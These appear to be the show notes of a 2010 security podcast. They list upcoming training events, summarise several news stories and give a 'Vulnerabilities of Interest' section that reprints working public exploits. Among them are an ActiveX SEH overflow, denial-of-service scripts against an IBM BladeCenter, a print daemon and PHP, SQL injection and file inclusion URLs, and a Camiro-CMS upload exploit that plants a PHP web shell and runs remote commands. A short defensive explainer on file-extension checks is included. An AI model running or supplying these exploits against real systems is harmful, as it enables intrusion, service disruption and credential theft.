ISD Podcast Episode 121 for May 3, 2010. This podcast is our contribution back to the community, where we discuss the vulnerabilities of interest and information-security-related news, hopefully providing you a few laughs and a little knowledge.
Announcements:
MyHardDriveDied.com:
- MHDD Data Recovery Class current dates and locations:
- San Diego – May 10th-14th
- San Francisco – June 14th -18th
- Atlanta – July – 12th-16th
- Chicago – September – 13th – 17th
- Dallas, TX – October – 11th – 15th
- Washington DC – December 6th – 10th
- Cost is $3500 for all classes. To reserve and register, call (678) 445-9007, email [email protected], or go to http://www.myharddrivedied.com. Use the discount code isdpodcast for a $300 discount.
SANS Community Atlanta:
- SANS Security 566: Implementing and Auditing the Twenty Critical Security Controls – In Depth May 17 – 21, 2010 (http://www.sans.org/atlanta-critical-controls-2010-cs)
SANS Mentoring Program:
- Jason Lawrence will also be putting on the SANS Mentor Forensics 508 – Computer Forensics and Investigations course in Sandy Springs starting Tuesday, June 22, 2010 – Tuesday, August 24, 2010 (http://www.sans.org/mentor/details.php?nid=21538). Use the Discount Code: isdpod15 for a 15% discount.
Atlanta ISSA:
- The ISSA Chapter is hosting a CISSP Workshop from May 26 to August 14 (preparing for the August 15, 2010 exam), 6:00 to 9:00 PM, two sessions per week, every Wednesday and Friday at the Clendenin Building, Kennesaw State University. The CISSP workshop is free of charge to Metro Atlanta ISSA members only. For further information, contact Ben Sholes, Director of Training, at: [email protected].
- ISSA International Conference – September 16, 2010 (http://www.issa.org/page/?p=105)
North Alabama ISSA:
- Hosting the second annual North Alabama Cyber Security Summit, to be held on June 9th in Huntsville, AL. The event is open to ISSA members at a discounted price ($35; full price is $50).
- For more information please visit the North Alabama ISSA’s web site at: http://northalabama.issa.org/
Kentuckiana ISSA:
- 6.5 hour Metasploit class on May 8th 2010 from 10am to 4:30pm (http://www.irongeek.com/i.php?page=security/louisville-metasploit-class)
Friends of the Podcast:
Webhosting services: WebSpeedway
Vulnerabilities of Interest:
- Magneto Software Net Resource ActiveX is subject to a Local Buffer Overflow (SEH) vulnerability. Version 4.0.0.5 is impacted, though others may be as well. Proof of Concept code is available:
<html>
<object classid='clsid:61251370-92BF-4A0E-8236-5904AC6FC9F2' id='target' /></object>
<script language='vbscript'>
'Magneto Software Net Resource ActiveX v4.0.0.5 NetFileClose SEH Exploit (Universal)
'Author: dookie
'Original PoC by: s4squatch - http://www.exploit-db.com/exploits/12206
'Vendor: http://www.magnetosoft.com/products/sknetresource/sknetresource_features.htm
'SKNetResource.ocx
'Function NetFileClose ( ByVal strServerName As String , ByVal dwFileId As Long ) As Long
'progid = "SKNETRESOURCELib.SKNetResource"
'win32_exec - EXITFUNC=seh CMD=calc.exe Size=338 Encoder=Alpha2 http://metasploit.com
'SEH overwrite - Around 620 Bytes for Shellcode
lead = String(394, "A")
nseh = unescape("%eb%06%90%90")
seh = unescape("%bc%08%01%10") ' 100108BC p/p/r in SKNetResource.ocx
trailer = String(312, "B")
arg1 = lead + nseh + seh + shellcode + trailer
arg2 = 1
target.NetFileClose arg1, arg2
</script>
- Softbiz B2B Trading Marketplace Script buyers_subcategories is subject to a SQL Injection vulnerability. Example URL is available: http://www.sample.com/buyers_subcategories.php?IndustryID=1+union+select+1,2,concat(LoginID,0x3d,password)+from+admin--
- Book Library .bkd file is subject to a Denial of Service vulnerability. Version 1.4.162 is impacted, though others may be as well. Proof of Concept code is available:
#!/usr/bin/env python
import time

print "The Encyclopedia of Unsolved Mysteries\n"
time.sleep(1)
book = open('unsolved.bkd', 'w')
book.write('\x00')
book.close()
print "UFO's, Atlantis, Nessie, Oh My!\n"
- IBM BladeCenter Management Module is subject to a Denial of Service vulnerability. An attacker can reset the management module by sending about five or ten malformed packets to the remote presence port (3900/tcp). All users of the management module and the management network will be disconnected. Proof of Concept code is available:
#!/usr/bin/perl
#
# BladeCenter AMM DoS
# by Alexey Sintsov
# Digital Security Research Group
#
# [http://dsecrg.com]
#

use Socket;

$target = '192.168.50.61';
for ($i = 1; $i <= 20; $i++)
{
    socket(SERVER, AF_INET, SOCK_STREAM, getprotobyname('tcp'));
    $trash = "\xf1" x 17;
    $target_ = inet_aton($target);
    $paddr = sockaddr_in(3900, $target_);
    sleep(2);
    if (connect(SERVER, $paddr))
    {
        recv(SERVER, $buf, 20, 0);
        send(SERVER, $trash, 1);
        close(SERVER);
        print "$i - fire!\n";
    }
    else
    {
        print "$i - refused!\n";
    }
}
print "\nDone\n";
- Mocha LPD is subject to a Denial of Service vulnerability. Version 1.9 is impacted, though others may be as well. Proof of Concept code is available:
#!/usr/bin/python
# #################################################################
# Mocha LPD v1.9 Remote Buffer Overflow DoS PoC
# Author: mr_me
# Software Link: http://mochasoft.dk/lpd.htm
# Version: 1.9
# Tested on: Windows XP SP3
# Advisory: http://www.corelan.be:8800/advisories.php?id=10-023
# Greetz to: Corelan Security Team
# http://www.corelan.be:8800/index.php/security/corelan-team-members/
# ##################################################################
# Script provided 'as is', without any warranty.
# Use for educational purposes only.
# Do not use this code to do anything illegal !
# Corelan does not want anyone to use this script
# for malicious and/or illegal purposes.
# Corelan cannot be held responsible for any illegal use.
#
# Note : you are not allowed to edit/modify this code.
# If you do, Corelan cannot be held responsible for any damages.
# ##################################################################
# Access violation here:
# MOV ECX,DWORD PTR DS:[EBX]
#
# The registers:
# EAX 00A2F978 ASCII "aaaaaaaaaaaaaaaaaaaaaaaaaaaa"..
# ECX 00006161
# EDX 00A20168
# EBX 61616161
# ESP 0012F4B8
# EBP 0012F6D4
# ESI 00A2F970 ASCII "aaaaaaaaaaaaaaaaaaaaaaaaaaaa"..
# EDI 61616161
# EIP 7C91AB8E ntdll.7C91AB8E

import sys, socket

print "********************************************************"
print " Mocha LPD Buffer Overflow DoS"
print " by mr_me"
print " http://net-ninja.net/ - mr_me(AT)corelan.be"
print "********************************************************"

if len(sys.argv) < 3:
    print "Usage: " + sys.argv[0] + " <target ip> <port>"
    sys.exit(0)

exploit = '\x05\x64\x65\x66\x61\x75\x6c\x74\x20'
exploit = '\x41' * 1500
exploit += '\x20\x61\x6c\x6c\x0a'

host = sys.argv[1]
port = int(sys.argv[2])

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    connect = s.connect((host, port))
except:
    print "[-] Cant connect!"
    sys.exit(1)

s.send("\x02")
print "[+] Sending evil payload.. ph33r o.O"
s.send(exploit)
print '[+] Server DoSed!'
s.close()
- RPM Select/Elite (.xml config parsing) is subject to a Unicode Denial of Service vulnerability. Version 5.0 is impacted, though others may be as well. Proof of Concept code is available:
#!/usr/bin/python
# ####################################################################
# RPM Select/Elite v5.0 (.xml config parsing) unicode buffer overflow PoC
# Found by: mr_me - http://net-ninja.net/
# Homepage: http://lpd.brooksnet.com/
# Download: http://www.brooksnet.com/download-rpmselect
# Tested on: Windows XP SP3
# Advisory: http://www.corelan.be:8800/advisories.php?id=10-024
# Greetz: Corelan Security Team
# http://www.corelan.be:8800/index.php/security/corelan-team-members/
# ####################################################################
# Notes: We overwrite EIP @ 32 bytes in, and the function doesnt copy
# enough of our string to hit SEH. However modules are compiled with
# SAFESEH anyway. Combine that with unicode and the printable ascii
# limitations, we are presented with to much of a hurdle.
# ####################################################################
# How to trigger the crash:
# file -> import configuration
# Click on the queue name, then click on the imported transform
# Click 'modify transform' and b00m!
# ####################################################################
# Script provided 'as is', without any warranty.
# Use for educational purposes only.
# Do not use this code to do anything illegal !
# Corelan does not want anyone to use this script
# for malicious and/or illegal purposes.
# Corelan cannot be held responsible for any illegal use.
#
# Note : you are not allowed to edit/modify this code.
# If you do, Corelan cannot be held responsible for any damages.

header1 = """<RPM version="5.0.70.6">
<Queues>
<Queue>
<description>lol</description>
<seqno>0</seqno>
<enabled>1</enabled>
<actions>1</actions>
<held>0</held>
<running>0</running>
<name>mr_mes print queue</name>
<Transforms>
<Transform>
<LineWrap>0</LineWrap>
<lfPitchAndFamily>48</lfPitchAndFamily>
<lfOrientation>0</lfOrientation>
<lfFaceName>
"""

header2 = """</lfFaceName>
<lfWidth>0</lfWidth>
<UseCharsPerInch>0</UseCharsPerInch>
<lfItalic>0</lfItalic>
<UseLinesPerPage>0</UseLinesPerPage>
<lfEscapement>0</lfEscapement>
<LinesPerInch>6.000000</LinesPerInch>
<type>24</type>
<LeftMargin>0.500000</LeftMargin>
<PortraitMax>90</PortraitMax>
<CharsPerInch>10.000000</CharsPerInch>
<CharsPerLine>80</CharsPerLine>
<TopMargin>0.500000</TopMargin>
<LinesPerPage>60</LinesPerPage>
<lfQuality>2</lfQuality>
<lfStrikeOut>0</lfStrikeOut>
<lfWeight>400</lfWeight>
<FontSize>12</FontSize>
<lfUnderline>0</lfUnderline>
<BottomMargin>0.500000</BottomMargin>
<Orientation>portrait</Orientation>
<InputFormat>1252</InputFormat>
<CalcLayout>false</CalcLayout>
<UseLinesPerInch>1</UseLinesPerInch>
<RightMargin>0.500000</RightMargin>
<CtrlStrip>1</CtrlStrip>
<UseCharsPerLine>0</UseCharsPerLine>
<lfCharSet>1</lfCharSet>
<lfOutPrecision>0</lfOutPrecision>
<lfClipPrecision>0</lfClipPrecision>
<SuppressBlankPage>1</SuppressBlankPage>
<lfHeight>-16</lfHeight>
</Transform>
</Transforms>
<Jobs />
</Queue>
</Queues>
<Hosts />
</RPM>
"""

payload = "\x41" * 32
payload += "\x42\x42"  # your "jmp to esp" instruction should go here
payload += "\x44" * (5000 - len(payload))  # pad to 5000 bytes (original read len(buffer), which is undefined)
exploit = header1.rstrip() + payload.rstrip() + header2.rstrip()

try:
    f = open("cst-rpm-config.xml", 'w')
    f.write(exploit)
    f.close()
    print "[+] File created successfully !"
except:
    print "[-] Error cannot write xml file to system\n"
- Nucleus CMS is subject to a Local File Inclusion vulnerability. Version 3.51 is impacted, though others may be as well. Proof of Concept URL is available: http://www.sample.com/nucleus/plugins/skinfiles/index.php?DIR_LIBS=../../../var/log/httpd/access_log%00
- Camiro-CMS is subject to a Remote Arbitrary File Upload vulnerability. Version beta-0.1 is impacted, though others may be as well. Proof of Concept code is available:
<?php
/*
-----------------------------------------------------------------
Camiro-CMS_beta-0.1 (fckeditor) Remote Arbitrary File Upload Exploit
-----------------------------------------------------------------
Download : http://camiro-cms.googlecode.com/files/Camiro-CMS_beta-0.1.tar.gz
exploited by ..: eidelweiss
special thnx to All Friends
details..: works with an Apache server with the mod_mime module installed

[-] vulnerable code in path/app/webroot/js/fckeditor/editor/filemanager/connectors/php/config.php

[*] // SECURITY: You must explicitly enable this "connector". (Set it to "true").
[*]
[*] $Config['Enabled'] = true ;
[*]
[*] // Path to user files relative to the document root.
[*] $Config['UserFilesPath'] = str_replace(strstr($_SERVER['PHP_SELF'], '/app/webroot/'), "/".$userFilesFolder."files/", $_SERVER['PHP_SELF']) ;
[*]
[*] // Fill the following value it you prefer to specify the absolute path for the
[*] // user files directory. Usefull if you are using a virtual directory, symbolic
[*] // link or alias. Examples: 'C:\\MySite\\UserFiles\\' or '/root/mysite/UserFiles/'.
[*] // Attention: The above 'UserFilesPath' must point to the same directory.
[*]
[*]
[*] $Config['AllowedExtensions']['File'] = array('7z', 'aiff', 'asf', 'avi', 'bmp', 'csv', 'doc', 'fla', 'flv', 'gif', 'gz', [....]
[*] $Config['DeniedExtensions']['File'] = array() ;
[*]
[*] $Config['AllowedExtensions']['Image'] = array('bmp','gif','jpeg','jpg','png') ;
[*] $Config['DeniedExtensions']['Image'] = array() ;
[*]
[*] $Config['AllowedExtensions']['Flash'] = array('swf','flv') ;
[*] $Config['DeniedExtensions']['Flash'] = array() ;
[*]
[*] $Config['AllowedExtensions']['Media'] = array('aiff', 'asf', 'avi', 'bmp', 'fla', 'flv', 'gif', 'jpeg', 'jpg', 'mid', 'mov', 'mp3', 'mp4', 'mpc', 'mpeg', 'mpg', 'png', 'qt', 'ram', 'rm', 'rmi', 'rmvb', 'swf', 'tif', 'tiff', 'wav', 'wma', 'wmv') ;
[*] $Config['DeniedExtensions']['Media'] = array() ;

with a default configuration of this script, an attacker might be able to upload arbitrary
files containing malicious PHP code due to multiple file extensions isn't properly checked
*/

error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);

function http_send($host, $packet)
{
    $sock = fsockopen($host, 80);
    while (!$sock)
    {
        print "\n[-] No response from {$host}:80 Trying again...";
        $sock = fsockopen($host, 80);
    }
    fputs($sock, $packet);
    $resp = "";
    while (!feof($sock)) $resp .= fread($sock, 1024);
    fclose($sock);
    return $resp;
}

function upload()
{
    global $host, $path;

    $connector = "/app/webroot/js/fckeditor/editor/filemanager/connectors/php/config.php";
    $file_ext = array("zip", "jpg", "fla", "doc", "xls", "rtf", "csv");

    foreach ($file_ext as $ext)
    {
        print "\n[-] Trying to upload with .{$ext} extension...";

        $data = "--abcdef\r\n";
        $data .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"0k.php.{$ext}\"\r\n";
        $data .= "Content-Type: application/octet-stream\r\n\r\n";
        $data .= "<?php \${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))}.\${print(_code_)} ?>\r\n";
        $data .= "--abcdef--\r\n";

        $packet = "POST {$path}{$connector}?Command=FileUpload&CurrentFolder={$path} HTTP/1.0\r\n";
        $packet .= "Host: {$host}\r\n";
        $packet .= "Content-Length: ".strlen($data)."\r\n";
        $packet .= "Content-Type: multipart/form-data; boundary=abcdef\r\n";
        $packet .= "Connection: close\r\n\r\n";
        $packet .= $data;

        preg_match("/OnUploadCompleted\((.*),'(.*)'\)/i", http_send($host, $packet), $html);
        if (!in_array(intval($html[1]), array(0, 201))) die("\n[-] Upload failed! (Error {$html[1]}: {$html[2]})\n");

        $packet = "GET {$path}0k.php.{$ext} HTTP/1.0\r\n";
        $packet .= "Host: {$host}\r\n";
        $packet .= "Connection: close\r\n\r\n";
        $html = http_send($host, $packet);

        if (!eregi("print", $html) and eregi("_code_", $html)) return $ext;
        sleep(1);
    }

    return false;
}

print "\n+---------------------------------------------------------------------------+";
print "\n| Camiro-CMS (fckeditor) Remote Arbitrary File Upload Exploit by eidelweiss |";
print "\n+---------------------------------------------------------------------------+\n";

if ($argc < 3)
{
    print "\nUsage......: php $argv[0] host path\n";
    print "\nExample....: php $argv[0] localhost /";
    print "\nExample....: php $argv[0] localhost /Camiro/\n";
    die();
}

$host = $argv[1];
$path = $argv[2];

if (!($ext = upload())) die("\n\n[-] Exploit failed...\n");
else print "\n[-] Shell uploaded...starting it!\n";

define(STDIN, fopen("php://stdin", "r"));

while(1)
{
    print "\nCamiro-shell# ";
    $cmd = trim(fgets(STDIN));
    if ($cmd != "exit")
    {
        $packet = "GET {$path}0k.php.{$ext} HTTP/1.0\r\n";
        $packet.= "Host: {$host}\r\n";
        $packet.= "Cmd: ".base64_encode($cmd)."\r\n";
        $packet.= "Connection: close\r\n\r\n";
        $html = http_send($host, $packet);
        if (!eregi("_code_", $html)) die("\n[-] Exploit failed...\n");
        $shell = explode("_code_", $html);
        print "\n{$shell[1]}";
    }
    else break;
}
?>
- Joomla Component com_iproperty is subject to a SQL Injection vulnerability. Version 1.5.3 is impacted, though others may be as well. Google Dork "inurl:option=ccom_iproperty". Proof of Concept URL is available: http://www.sample.com/index.php?option=com_iproperty&view=agentproperties&id=[elich4]
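The Camiro-CMS item above turns on one weakness: the FCKeditor connector only looks at the final extension, so a name like 0k.php.jpg passes the image whitelist while Apache mod_mime (when PHP is wired in through AddHandler) still treats the file as PHP. The following is an added illustration, not Camiro-CMS or FCKeditor code: the weak last-extension check beside a check that validates every extension, plus the rename strategy later FCKeditor connectors use under their ForceSingleExtension setting. The whitelist is the AllowedExtensions['Image'] list quoted above; the function names and sample filenames are my own.

```php
<?php
// Added example (not Camiro-CMS or FCKeditor code): why checking only the last
// extension is not enough under Apache mod_mime, and two stricter alternatives.
// Whitelist taken from the $Config['AllowedExtensions']['Image'] list quoted above.
$allowedImage = ['bmp', 'gif', 'jpeg', 'jpg', 'png'];

// Weak check: looks only at the text after the final dot.
// "0k.php.jpg" passes because "jpg" is whitelisted, yet with
// "AddHandler application/x-httpd-php .php" mod_mime still runs the file as PHP.
function weakIsAllowed(string $filename, array $allowed): bool
{
    $ext = strtolower(pathinfo($filename, PATHINFO_EXTENSION));
    return in_array($ext, $allowed, true);
}

// Stricter check: every dot-separated segment after the base name must be on
// the whitelist, so "0k.php.jpg" is rejected while "photo.jpg" is accepted.
function strictIsAllowed(string $filename, array $allowed): bool
{
    $parts = explode('.', basename($filename));
    if (count($parts) < 2) {
        return false;                       // no extension at all
    }
    array_shift($parts);                    // drop the base name
    foreach ($parts as $segment) {
        if ($segment === '' || !in_array(strtolower($segment), $allowed, true)) {
            return false;                   // empty or non-whitelisted segment
        }
    }
    return true;
}

// Rename strategy (the idea behind FCKeditor's later ForceSingleExtension
// option): keep the last extension and turn every other dot into an
// underscore, so "0k.php.jpg" is stored as "0k_php.jpg", which mod_mime
// no longer maps to the PHP handler.
function forceSingleExtension(string $filename): string
{
    $ext  = pathinfo($filename, PATHINFO_EXTENSION);
    $base = pathinfo($filename, PATHINFO_FILENAME);   // "0k.php" for "0k.php.jpg"
    return str_replace('.', '_', $base) . ($ext !== '' ? '.' . $ext : '');
}

// Constructed sample names, including the one the exploit above uploads.
foreach (['photo.jpg', '0k.php.jpg', 'shell.php', 'notes.txt.png'] as $name) {
    printf("%-14s weak=%-5s strict=%-5s stored-as=%s\n", $name,
        weakIsAllowed($name, $allowedImage) ? 'allow' : 'deny',
        strictIsAllowed($name, $allowedImage) ? 'allow' : 'deny',
        forceSingleExtension($name));
}
```

Running it shows 0k.php.jpg and notes.txt.png allowed by the weak check but denied by the strict one, and stored as 0k_php.jpg / notes_txt.png by the rename strategy; the check has to live on the server in the connector, since the exploit never touches the browser-side editor.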
- PHP is subject to a Denial of Service (DoS) vulnerability. Version 5.3.0 is impacted, though others may be as well. Proof of Concept code is available:
<?php
$junk = str_repeat("99999999999999999999999999999999999999999999999999", 99999);
for ($i = 0; $i < 2;) {
    $buff = bcpow($junk, '3', 2);
    $buff = null;
}
//Coded By Pejvak;
?>
Stories of Interest:
News item 1: http://www.darkreading.com/database_security/security/privacy/showArticle.jhtml?articleID=224600001
Affinity Health Plan, a New York managed care service, is notifying more than 400,000 current and former customers and employees that their personal data may have been leaked through the loss of an unerased digital copier hard drive.
According to a press release quietly issued earlier this month, some personal records were found on the hard drive of a copier found in a New Jersey warehouse. The copier had previously been leased by Affinity and was then returned to the leasing company, the release states.
The disclosure follows the airing of a CBS News report which calls attention to the practice of recycling or resale of copiers whose hard drives have not been properly erased.
The report showed the discovery of numerous medical records found on warehoused digital copiers. An executive at a company that makes hard-drive-erasure products used a free forensics tool to glean the data from one of the copiers in the CBS News report.
News item 2: http://securityblog.verizonbusiness.com/2010/04/22/redefining-security-researcher/
In an official blog post, an employee in Verizon’s Risk Intelligence unit has taken aim at researchers who disclose security flaws, calling them “Narcissistic vulnerability pimps” and comparing them to criminals.
“Have you ever heard of a terrorist referred to as a ‘demolition engineer?’” the unnamed author of the rant asked, one presumes rhetorically. “How about a thief as a ‘locksmith?’ No? Well, that’s because most fields don’t share the InfoSec industry’s ridiculous yet long-standing inability to distinguish the good guys from the bad guys.”
The post goes on to propose that a person who discloses security flaws henceforth be labeled a “narcissistic vulnerability pimp,” which the writer defines as “One who – solely for the purpose of
self-glorification and self-gratification – harms business and society by irresponsibly disclosing information that makes things less secure.”
Besides making security researchers out to be men in the "Joseph and the Amazing Technicolor Dreamcoat" with big ole' feathered hats, this comparison is problematic for other reasons. As the recent Pwn2Own contest made abundantly clear, software makers can't be counted on to secure their products, at least not on their own. Security researchers armed with real-world vulnerabilities provide an important check on internal security teams and give them a powerful incentive to be thorough in finding bugs and swift in fixing them.
News item 3: http://us.mcafee.com/en-us/landingpages/np5959.asp?cid=77220
Anti-virus firm McAfee is reimbursing people who have spent money getting their computers fixed after they were damaged by the last security update.
An update of active viruses issued by McAfee last week falsely labelled part of the Windows operating system as a virus. This sent computers into a continuous reboot cycle and cut off network access.
Customers are asked to call a local, toll-free number to talk to a technician. If they are unable to fix the problem then a software fix can be downloaded to another machine. If this is not possible McAfee will send a CD.
If you have already spent money on fixing your machine then McAfee said it was “committed to reimbursing reasonable expenses”.